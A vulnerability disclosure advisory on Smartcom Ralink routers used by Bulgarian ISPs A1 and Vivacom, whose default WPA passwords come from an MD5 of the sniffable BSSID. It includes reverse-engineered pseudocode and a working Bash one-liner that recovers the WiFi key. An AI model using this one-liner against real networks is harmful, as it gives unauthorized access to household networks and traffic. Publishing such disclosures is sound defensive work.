TITLE
    Smartcom Ralink routers use weak default WiFi password generation algorithm

DATE
    2 Jan 2025

CWE MAPPING
    CWE-1391: Use of Weak Credentials

CVSS
    CVSS v4.0 Score: 8.6 / High
    CVSS Vector:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:H/SC:H/SI:H/SA:H

VENDOR
    Smartcom Bulgaria (https://smartcom.bg)

DEVICES
    The following device models are affected by this vulnerability:
    * SAM-4G1G-TT-W-VC
    * SAM-4F1F-TT-W-A1
    * OUI: 50a9de

DESCRIPTION
    The rootfs of the device can be read directly from the flash. After careful review, we've
    identified 3 binaries of interest:
        /bin/ralink_init
        /bin/nvram_set
        /bin/nvram_get
    All 3 contain implementation of the function show_wifi_pass(), which after reverse
    engineering translates to the following pseudocode:

        function show_wifi_pass(serial)
            if (serial == NULL) serial = flash_read_serial()
            serial = tolower(serial)
            preimage = serial + "SmartcomWifi"
            preimage_md5 = md5(preimage)
            return preimage_md5[0:8]

    The serial number of these routers generally consists of the last 4 bytes of the BSSID,
    sometimes with applied offset. The AP BSSID is part of the BEACON WiFi frames and can
    be captured in clear via simple over the air sniffing.

POC
    The following Bash one-liner implements the default password generation, based on AP's BSSID:

    read -p 'Enter BSSID: ';echo -n 'WPA Key: ';echo -n ${REPLY: -8}SmartcomWifi|md5sum|cut -c -8

IMPACT
    Successful attack allows for:
        * Unrestricted access to the internal network of the user.
        * Access to the local administrative interface of the router through hardcoded credentials.
        * Decryption of WiFi traffic.
        * Implementation of active MITM attacks against clients, outside the AP coverage.
    More than 200,000 Smartcom Ralink routers are deployed by the two largest
    Bulgarian telecom providers A1 and Vivacom[1].
    A1 routers use custom ESSID in the form of "A1_XXXXXX", where XXXXXX are the last 3 octets of
    the BSSID. Information on these routers can be found on A1's support page[2].
    Vivacom routers set a static ESSID with the name "VIVACOM_FiberNet[_5GHz]". This is
    unfortunate, since using the same ESSID for multiple APs allows for PMK computation reuse and
    mass PSK attacks. Also, may cripple the WiFi connectivity in crowded areas because of random
    clients trying to connect to the AP with their own wrong PSK.
    Based on information, collected in wpa-sec.stanev.org, at least 69% of A1 and 54% of Vivacom
    clients are using AP default ESSID and password.

WORKAROUND
    Never leave the default ESSID and password on the devices you're using. Change them via
    the device configuration panel, ISP provided interface or call ISP support for help.

TIMELINE
    *  2 Jan 2025: Vulnerability reported to Smartcom, A1, Vivacom
    *  2 Jan 2025: Vivacom acknowledges the vulnerability
    *  6 Jan 2025: Smartcom states the products in question are EoL/EoD, there will be no fix
    *  9 Jan 2025: 2nd reminder to A1 sent, no response
    *  5 Feb 2025: Public disclosure

CREDITS
    Radoslav Gerganov <rgerganov@gmail.com>, X: @rgerganov, Web: https://xakcop.com
    Alex Stanev <alex@stanev.org>, X: @RealEnderSec, Web: https://sec.stanev.org

REFERENCES
    [1] https://smartcom.bg/customer-success/csp-xcpe
    [2] https://help.a1.bg/internet/fixed-internet/wireless-routers/smartcom-ralink